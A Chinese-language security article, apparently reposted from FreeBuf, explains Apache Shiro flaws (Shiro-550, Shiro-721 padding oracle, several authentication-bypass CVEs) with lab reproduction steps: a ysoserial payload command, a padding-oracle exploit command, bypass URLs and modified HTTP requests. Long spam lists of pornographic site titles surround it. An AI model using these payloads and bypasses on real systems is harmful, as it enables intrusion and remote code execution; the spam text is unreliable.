久久久精品视频在线_免费在线a视频_在线看的黄色网址_懂色av粉嫩av浪潮av_艳妇乳肉豪妇荡乳av_国产午夜大地久久_国产在线观看免费播放_天堂视频免费看_久久精品女同亚洲女同13_各处沟厕大尺度偷拍女厕嘘嘘

當前位置: 首頁 >綜合 > 正文

一文讀懂面試官都在問的Shiro漏洞

2023-06-13 10:03:51 來源:FreeBuf.COM
漏洞簡介

shiro-550主要是由shiro的rememberMe內容反序列化導致的命令執行漏洞,造成的原因是默認加密密鑰是硬編碼在shiro源碼中,任何有權訪問源代碼的人都可以知道默認加密密鑰。于是攻擊者可以創建一個惡意對象,對其進行序列化、編碼,然后將其作為cookie的rememberMe字段內容發送,Shiro 將對其解碼和反序列化,導致服務器運行一些惡意代碼。


【資料圖】

特征:cookie中含有rememberMe字段

修復建議:

更新shiro到1.2.4以上的版本。不使用默認的加密密鑰,改為隨機生成密鑰。漏洞原理一、Shiro簡介

Apache Shiro 是一個強大易用的 Java 安全框架,提供了認證、授權、加密和會話管理等功能,對于任何一個應用程序,Shiro 都可以提供全面的安全管理服務。

在Apache Shiro<=1.2.4版本中AES加密時采用的key是硬編碼在代碼中的,于是我們就可以構造RememberMe的值,然后讓其反序列化執行。

Primary Cocnerns(基本關注點):

Authentication(認證):經常和登錄掛鉤,是證明用戶說他們是誰的一個工作Authorization(授權):訪問控制的過程,即,決定‘誰’可以訪問‘什么Session Management(會話管理):管理用戶特定的會話,即使在非web或是EJB的應用中Crytography(加密):通過加密算法保證數據的安全,且易于使用

Supporting Features(輔助特性):

Web Support(網絡支持):web support API可以幫助在web應用中方便的使用shiroCaching(緩存):保證安全操作使用快速有效Concurrency(并發):支持多線程應用Testing(測試):支持集成單元測試Run As(以..運行):可以假定用戶為另一個用戶Remeber Me:記住用戶,無需再次登錄二、Shiro服務器識別身份加解密處理的流程1、加密用戶使用賬號密碼進行登錄,并勾選”Remember Me“。Shiro驗證用戶登錄信息,通過后,查看用戶是否勾選了”Remember Me“。若勾選,則將用戶身份序列化,并將序列化后的內容進行AES加密,再使用base64編碼。最后將處理好的內容放于cookie中的rememberMe字段。2、解密當服務端收到來自未經身份驗證的用戶的請求時,會在客戶端發送請求中的cookie中獲取rememberMe字段內容。將獲取到的rememberMe字段進行base64解碼,再使用AES解密。最后將解密的內容進行反序列化,獲取到用戶身份。三、Key

AES加密的密鑰Key被硬編碼在代碼里

漏洞復現

攻擊機IP:192.168.0.109

靶機IP:192.168.72.128

1、訪問靶機

存在Remember me選項,嘗試抓包

2、漏洞利用

Github上工具很多,我們隨便拿一款來進行驗證

爆破密鑰成功后,即可執行命令

Shiro-721反序列化漏洞(CVE-2019-12422)
漏洞簡介0x01首先講一下面試官經常會問到的一個問題

Shiro550和Shiro721的區別是什么

Shiro550只需要通過碰撞key,爆破出來密鑰,就可以進行利用Shiro721的ase加密的key一般情況下猜不到,是系統隨機生成的,并且當存在有效的用戶信息時才會進入下一階段的流程所以我們需要使用登錄后的rememberMe Cookie,才可以進行下一步攻擊0x02 漏洞指紋URL中含有Shiro字段cookie中含有rememberMe字段返回包中含有rememberMe0x03 漏洞介紹

在Shiro721中,Shiro通過AES-128-CBC對cookie中的rememberMe字段進行加密,所以用戶可以通過Padding Oracle加密生成的攻擊代碼來構造惡意的rememberMe字段,進行反序列化攻擊,需要執行的命令越復雜,生成payload需要的時間就越長。

漏洞原理

由于Apache Shiro cookie中通過 AES-128-CBC 模式加密的rememberMe字段存在問題,用戶可通過Padding Oracle 加密生成的攻擊代碼來構造惡意的rememberMe字段,用有效的RememberMe cookie作為Padding Oracle Attack 的前綴,然后制作精心制作的RememberMe來執行Java反序列化攻擊

攻擊流程

登錄網站,并從cookie中獲取RememberMe。使用RememberMe cookie作為Padding Oracle Attack的前綴。加密syserial的序列化有效負載,以通過Padding Oracle Attack制作精心制作的RememberMe。請求帶有新的RememberMe cookie的網站,以執行反序列化攻擊。攻擊者無需知道RememberMe加密的密碼密鑰。

AES-128-CBC

屬于AES加密算法的CBC模式,使用128位數據塊為一組進行加密解密,即16字節明文,對應16字節密文,,明文加密時,如果數據不夠16字節,則會將數據補全剩余字節

若最后剩余的明文不夠16字節,需要進行填充,通常采用PKCS7進行填充。比如最后缺3個字節,則填充3個字節的0x03;若最后缺10個字節,則填充10個字節的0x0a;若明文正好是16個字節的整數倍,最后要再加入一個16字節0x10的組再進行加密Padding Oracle Attack原理

Padding Oracle攻擊可以在沒有密鑰的情況下加密或解密密文

Shiro Padding Oracle Attack(Shiro填充Oracle攻擊)是一種針對Apache Shiro身份驗證框架的安全漏洞攻擊。Apache Shiro是Java應用程序中廣泛使用的身份驗證和授權框架,用于管理用戶會話、權限驗證等功能。

Padding Oracle Attack(填充Oracle攻擊)是一種針對加密算法使用填充的安全漏洞攻擊。在加密通信中,填充用于將明文數據擴展到加密算法塊大小的倍數。在此攻擊中,攻擊者利用填充的響應信息來推斷出加密算法中的秘密信息。

Shiro Padding Oracle Attack利用了Shiro框架中的身份驗證過程中的一個漏洞,該漏洞允許攻擊者通過填充信息的不同響應時間來確定身份驗證過程中的錯誤。通過不斷嘗試不同的填充方式,攻擊者可以逐步推斷出加密秘鑰,并最終獲取訪問權限。

這種攻擊利用了填充錯誤的身份驗證響應來獲取關于秘密信息的信息泄漏,然后根據這些信息進行進一步的攻擊。為了防止Shiro Padding Oracle Attack,建議及時更新Apache Shiro版本,確保已修復該漏洞,并采取其他安全措施,如使用安全的加密算法和密鑰管理策略。

漏洞復現1、拉取環境

docker pull vulfocus/shiro-721docker run -d -p 8080:8080 vulfocus/shiro-721

環境啟動完成后,在本地瀏覽器訪問靶場地址:your-ip:8080

2、攻擊環節

0x01 登錄成功后,我們從Cookie中獲取到rememberMe字段的值

0x02 使用ysoserial生成Payload

java -jar ysoserial.jar CommonsCollections1 "touch /tmp/YikJiang" > payload.class

0x03 使用rememberMe值作為prefix,加載Payload,進行Padding Oracle攻擊。

python shiro_exp.py http://47.95.201.15:8080/account/ k+3DDsh6f+macxMUtS2QvAS7Fm3CyMpFB6wz4apvrieZhTIMaLey74RYMgywpM2fFncf3y7cRTU6F73MIJ5ygJ0QqzYlvX2xcmOUCe+uLiH66B0aAcs7vY6Ipimbo8tTX3vbReu0vovnmDVK4fT+lfmhZxtgFp8imCapqIb6KYr3NtmQTfORGhFZ+I2vzMN2geaYRwFkTbzfuo8vHgmzHJaR1jTn2sLVaxiIuqMYqsjiCVvN7q64wpde0JGQs1eowMKJ5VSlnUnp1NGficIFYdTETxDjJJHrmKNSxdHPCstWfQD3N6jEK1CT3vE+UxxVrtSO2XoBEHYrSTdK1bxVtunwVu5+F7lfwex3b2qY/F6EzCUjzKQN13AmqhrnyesRx+AYNzVFCZ49oYfj/dtz1XKbGr9anMuw6dq/avJdMfHzlEUThYFgZ2yRSUBAlOGliwwV+GRuhjRocka3wAgjxyG80VdJiovtXhoEhvd3peYC6TzPi2hPVXppVq3P+F8s payload.class

生成的payload.class內容越多時間就越長,所以盡量選擇較短的命令執行來復現漏洞即可。最終會生成如下rememberMe cookies

我們將跑出來的Cookie添加到數據包中進行發送,就可以 發現在靶機中成果創建了對應的文件。

到這未知其實經常遇到的Shrio漏洞已經表述的差不多了,下面幾個是shiro存在但是在現實中利用難度大或者是比較少的洞,可以簡單了解一下

Shiro 認證繞過漏洞(CVE-2020-1957)漏洞原理

在Apache Shiro 1.5.2以前的版本中,在使用Spring動態控制器時,攻擊者通過構造..;這樣的跳轉,可以繞過Shiro中對目錄的權限限制。

URL請求過程:

客戶端請求URL:/xxx/..;/admin/Shrio 內部處理得到校驗URL為/xxxx/..,校驗通過SpringBoot 處理/xxx/..;/admin/, 最終請求/admin/, 成功訪問了后臺請求。漏洞復現1、權限配置

@Beanpublic ShiroFilterChainDefinition shiroFilterChainDefinition() { DefaultShiroFilterChainDefinition chainDefinition = new DefaultShiroFilterChainDefinition(); chainDefinition.addPathDefinition("/login.html", "authc"); // need to accept POSTs from the login form chainDefinition.addPathDefinition("/logout", "logout"); chainDefinition.addPathDefinition("/admin/**", "authc"); return chainDefinition;}2、默認狀態

直接請求管理頁面/admin/,無法訪問,將會被重定向到登錄頁面

3、繞過POC

構造惡意請求/xxx/..;/admin/,即可繞過權限校驗,訪問到管理頁面:

Shiro 身份驗證繞過 (CVE-2020-13933)漏洞簡介

CVE-2020-11989的修復補丁存在缺陷,在1.5.3及其之前的版本,由于shiro在處理url時與spring仍然存在差異,依然存在身份校驗繞過漏洞由于處理身份驗證請求時出錯,遠程攻擊者可以發送特制的HTTP請求,繞過身份驗證過程并獲得對應用程序的未授權訪問。

該漏洞產生的原因主要是shiro層在處理url上和spring上存在差異,主要是在處理;上的問題,通過構造含有;符號的url即可繞過shiro在權限上的處理,而spring不負責權限管控,所以最終會導致權限繞過。ant風格的路徑僅出現一個*時才能成功,而**無法繞過,*:匹配一個或者多個任意的字符。

**:匹配零個或者多個目錄。

漏洞復現1、開啟環境2、正常訪問敏感界面

/admin/admin

提示讓我們登錄

3、通過%3b繞過,不觸發身份驗證并且繞過權限

/admin/%3badmin

Shiro 授權繞過 (CVE-2022-32532)漏洞簡介

Apache Shiro是一個強大且易用的Java安全框架,執行身份驗證、授權、密碼和會話管理。

1.9.1 之前的 Apache Shiro,RegexRequestMatcher 可能被錯誤配置為在某些 servlet 容器上被繞過。在正則表達式中使用帶有.的 RegExPatternMatcher 的應用程序可能容易受到授權繞過。

漏洞概述

2022年6月29日,Apache 官方披露 Apache Shiro 權限繞過漏洞(CVE-2022-32532),當 Apache Shiro 中使用 RegexRequestMatcher 進行權限配置,且正則表達式中攜帶“.”時,未經授權的遠程攻擊者可通過構造惡意數據包繞過身份認證。

影響范圍

Apache Shiro < 1.9.1

利用流程

訪問

抓包修改

GET /permit/any HTTP/1.1Host: 123.58.224.8:36930Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: think_lang=zh-cnConnection: close

需要攜帶token字段

改包繞過

GET /permit/%0any HTTP/1.1Host: 123.58.224.8:36930Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: think_lang=zh-cnConnection: close

標簽:

返回頂部
国产va亚洲va在线va| 国产肥老妇视频| 十八禁视频网站在线观看| 日韩视频在线观看免费视频| 亚洲成人久久精品| 日韩精品无码一区二区| 成年网站在线免费观看| 国产亚洲精品精品精品| 无码精品视频一区二区三区 | 伊人网综合视频| 国产精品国产av| 久久久久久久黄色| 国产男女激情视频| 精品国产一区二区三区在线| 精品黑人一区二区三区观看时间| 精品国产黄色片| 久久精品久久久久久久| 午夜av中文字幕| aⅴ在线免费观看| 久久精品在线免费视频| 五月婷婷婷婷婷| av直播在线观看| 香蕉视频成人在线| 精品人妻午夜一区二区三区四区| 日本黄色一级视频| 91精品国产高潮对白| 国产一伦一伦一伦| 动漫av网站免费观看| 国产精品一区在线免费观看| 337人体粉嫩噜噜噜| 亚洲av成人无码一二三在线观看| 六月丁香色婷婷| 国产手机精品视频| 中文天堂在线视频| 亚洲综合图片网| 成人免费看片98欧美| 性欧美在线视频| 91欧美视频在线| 国产成人手机视频| 成熟老妇女视频| 国产美女无遮挡网站| 日韩精品在线中文字幕| 国产欧美久久久久| 成人国产在线看| 国产奶头好大揉着好爽视频| 亚洲综合久久av一区二区三区| 免费黄色在线视频| 37p粉嫩大胆色噜噜噜| 无码人妻aⅴ一区二区三区 | 日本一级淫片演员| 澳门黄色一级片| 91插插插插插插| 99鲁鲁精品一区二区三区| 国产精品麻豆一区| 国产成人免费在线观看视频| 国产又粗又长免费视频| 9.1片黄在线观看| 国产又粗又长又黄的视频| 亚洲女人毛茸茸高潮| 婷婷国产成人精品视频| 北条麻妃在线观看视频| 欧美 日韩 国产 一区二区三区| 国产稀缺精品盗摄盗拍| 日本精品人妻无码77777| 一级全黄肉体裸体全过程| 一二三四中文字幕| 无码人妻丰满熟妇区96| 国产精品乱码久久久久| 天天综合天天添夜夜添狠狠添| 日日躁夜夜躁aaaabbbb| 奇米777在线视频| 久热精品在线观看| 亚洲伊人成人网| 中文字幕av在线免费观看| 国产伦精品一区二区三区视频痴汉| 国产精品嫩草影院精东| 免费观看国产精品| 亚洲av成人片色在线观看高潮| xxx在线播放| 丰满少妇高潮久久三区| 高清欧美精品xxxxx| 日韩福利视频在线| 亚洲国产精品午夜在线观看| 欧美人一级淫片a免费播放| 国产成年妇视频| 四虎成人免费视频| 久久成人小视频| 97超碰人人澡| 三区视频在线观看| 黄色污污视频软件| 秋霞av鲁丝片一区二区| 亚洲熟女乱综合一区二区三区| 在线观看天堂av| 精品无码一区二区三区爱欲| 天堂一区在线观看| 无码免费一区二区三区| 亚洲精品97久久中文字幕| 中文字幕一二三| 亚洲AV成人无码网站天堂久久| 在线观看污视频| 国产精品入口免费软件| 日本亚洲色大成网站www久久| 中文字幕观看视频| 四虎成人免费视频| 午夜69成人做爰视频| 任你操这里只有精品| 日本一级黄色录像| 亚洲国产精品一| 欧美激情aaa| 韩日视频在线观看| 欧美成人综合色| 国产免费黄色片| 中文幕无线码中文字蜜桃| 国产又粗又长又爽视频| 中文字幕视频三区| 91亚洲欧美激情| 欧美bbbbb性bbbbb视频| 国产freexxxx性播放麻豆| 天天久久综合网| av网站免费大全| 国产极品视频在线观看| 亚洲中文字幕无码中文字| 日韩污视频在线观看| 欧美视频一二区| 爱爱视频免费在线观看| 欧美性猛交xxx乱久交| а中文在线天堂| 久久人人爽人人爽人人片| 日韩极品视频在线观看| 国产在线精品观看| 免费观看黄网站| 日本在线一级片| 精产国品一二三区| 天天摸夜夜添狠狠添婷婷| 五月婷婷一区二区三区| 免费人成在线观看| 日韩精品――色哟哟| 久久久久久久久影视| 日本特黄一级片| 最新版天堂资源在线| 视色,视色影院,视色影库,视色网| 欧美三级小视频| 天天操天天爱天天干| 国产成人一二三区| 影音先锋在线国产| 亚洲第九十七页| 992kp快乐看片永久免费网址| 91精品在线视频观看| 日本二区三区视频| 国产一级中文字幕| 成人免费无码大片a毛片| 日本wwww视频| 国产福利视频导航| eeuss中文| 国产一级片免费在线观看| 精品人伦一区二区三电影 | 欧美日韩大片在线观看| 亚洲欧美日韩免费| 国产l精品国产亚洲区久久| 一级黄色片免费看| 国产又大又长又粗又黄| 欧美特黄aaaaaa| 免费在线观看a视频| 国产成人强伦免费视频网站| 精品无码av一区二区三区| www.com毛片| 亚洲乱色熟女一区二区三区| 国产黄色片免费在线观看| 中文字幕人妻一区二区在线视频 | 国产亚洲第一页| 一出一进一爽一粗一大视频| 欧美大片久久久| 在线观看国产免费视频| 亚洲精品www.| 少妇精品一区二区| 黄色一级片在线| 精品久久久久久中文字幕人妻最新| 网站在线你懂的| 黄色正能量网站| 精品一区免费观看| 国产午夜精品久久久久久久久| 久久久久久久蜜桃| 国产又粗又猛又爽又黄的视频小说| 日韩手机在线观看| 欧美视频www| 91九色蝌蚪91por成人| 久久99久久久久久| 免费看国产片在线观看| 亚洲乱码国产一区三区| 国模无码视频一区| 久热精品在线观看| 国产老头老太做爰视频| 中文字幕有码无码人妻av蜜桃| 久久久久亚洲av无码专区喷水| 91国内精品视频| av免费播放网址| 国产精品熟妇一区二区三区四区 | 黄色在线免费观看| www.18av.com| 亚洲欧美一区二区三| 欧美国产日韩另类| 国产在线观看免费视频软件| 亚洲一区在线观| 欧美污视频网站| 日本japanese极品少妇| 欧美啪啪小视频| 日韩精品在线视频免费观看| 日本高清视频免费看| 中文字幕日韩久久| 成年人二级毛片| 亚洲经典一区二区| 免费不卡av网站| 国产精品无码乱伦| 国产香蕉在线观看| 日本特黄在线观看| 法国空姐在线观看免费| 亚洲日本香蕉视频| 亚洲国产综合久久| 久久av高潮av| 中文字幕18页| 国产一区免费看| av网站在线观看不卡| 精品国产无码在线观看| 一本色道久久综合亚洲| 男人插女人下面免费视频| 国产精品久久免费观看| 99在线无码精品入口| 一二三av在线| 337p亚洲精品色噜噜狠狠p| 免费看91视频| 亚洲精品91天天久久人人| 成人三级视频在线播放| 一本一本久久a久久| 欧美性猛交 xxxx| 久久久久99精品成人片我成大片| 青青草视频在线免费播放| 一级黄色片大全| 国产丰满美女做爰| xxxxxx国产| 亚洲国产精品久久久久爰色欲| 娇妻被老王脔到高潮失禁视频| 99精品免费观看| 日本午夜小视频| 91精品91久久久中77777老牛| 欧美a在线播放| 日本wwwxx| 一级片视频免费| 久久久久久蜜桃| 久久精品.com| 精品一区二区成人免费视频 | 手机av在线网站| 久久国产午夜精品理论片最新版本| 欧类av怡春院| 亚洲精品国产手机| 69xxxx国产| 国内av免费观看| 免费看又黄又无码的网站| 亚洲色图100p| 黄色av网址在线观看| www天堂在线| 自拍偷拍第八页| 九九九国产视频| 亚洲精品自拍网| 国产精品999视频| 手机在线免费看毛片| 国产福利短视频| 亚洲成人福利视频| 国产手机av在线| 男人天堂av在线播放| av免费一区二区| 国产精品少妇在线视频| 中国一级大黄大黄大色毛片| 欧美巨胸大乳hitomi| aaa黄色大片| 欧日韩在线视频| 国产老女人乱淫免费| 永久免费无码av网站在线观看| 99中文字幕在线| 亚洲性图一区二区| 国产精品-区区久久久狼| 一级性生活视频| 亚洲综合视频网站| 亚洲高潮女人毛茸茸| 久久中文字幕人妻| 大尺度在线观看| 九色91porny| 亚洲人视频在线观看| 亚洲精品97久久中文字幕无码| 一级黄色大片免费| 中文字幕第2页| 波多野结衣高清在线| 亚洲欧美另类在线视频| 国产成人亚洲精品自产在线| 波多野结衣网页| 四虎1515hh.com| 黄色一级片免费播放| 日韩av自拍偷拍| 国产又粗又长又爽又黄的视频| 狠狠干狠狠操视频| 国产美女18xxxx免费视频| 亚洲国产精品三区| 日本国产一级片| 九九九久久久久久久| 天天操精品视频| 激情五月少妇a| 国产一级特黄aaa大片| 日韩精品国产一区二区| 久久草视频在线| 亚洲 欧美 中文字幕| 国产精品无码一区| 91亚洲欧美激情| 国产国语亲子伦亲子| 亚洲av无码片一区二区三区| www.热久久| 91丨porny丨九色| 中文字幕精品视频在线| 中文字幕在线看高清电影| 性欧美精品男男| 国产探花在线免费观看| 好吊色视频988gao在线观看| 国产一区二区四区| 欧美 激情 在线| 福利视频999| 亚洲视频免费播放| 国产亚洲久一区二区| 91亚洲国产成人精品一区| 精品人妻一区二区三区浪潮在线| www.色视频| 久久久久久久穴| 谁有免费的黄色网址| 色欲人妻综合网| www.日本在线播放| 天天色综合社区| 国产无遮挡又黄又爽又色| 国产免费一级视频| 国产黄a三级三级三级| 日本55丰满熟妇厨房伦| mm131美女视频| www亚洲国产| 色诱视频在线观看| 免费一级全黄少妇性色生活片| 国产精品777777| 亚洲欧美强伦一区二区| 先锋资源av在线| 91嫩草丨国产丨精品| 欧美 日韩 国产在线观看| 中文字幕线观看| 波多野结衣人妻| 熟妇人妻中文av无码| 97伦伦午夜电影理伦片| 黄色一级大片在线免费观看| 免费看国产曰批40分钟| www.久久久精品| 精品国产乱子伦| 色婷婷综合视频| 99热6这里只有精品| 18禁免费观看网站| 国产极品在线播放| 亚洲av少妇一区二区在线观看 | 成熟妇人a片免费看网站| 成人三级视频在线观看| 日本毛片在线免费观看| 国产精品成人aaaa在线| www.亚洲黄色| 午夜精产品一区二区在线观看的| 精品人妻大屁股白浆无码| 欧美一级免费在线| 一级淫片免费看| 色无极影院亚洲| 欧美视频在线观看网站| 国产精品1000| 性感美女一级片| 国产精品无码99re| 亚洲女人在线观看| 99riav国产| 91导航在线观看| 欧美日韩大尺度| 最近中文字幕在线观看| 美国黄色a级片| www国产精品内射老熟女| 五月婷婷亚洲综合| 中文字幕人妻一区| a级免费在线观看| 中文字幕在线字幕中文| 亚洲911精品成人18网站| 特级毛片在线免费观看| 免费无码毛片一区二区app| 高清毛片aaaaaaaaa片| 少妇高潮在线观看| 欧美精品色视频| 午夜视频免费在线| 免费人成自慰网站| 黄色大片网站在线观看| 午夜男人的天堂| 97av视频在线观看| 国产精品久久久久久69| 亚洲少妇xxx| 久久一区二区三| 国产人妖在线观看| 五月丁香综合缴情六月小说|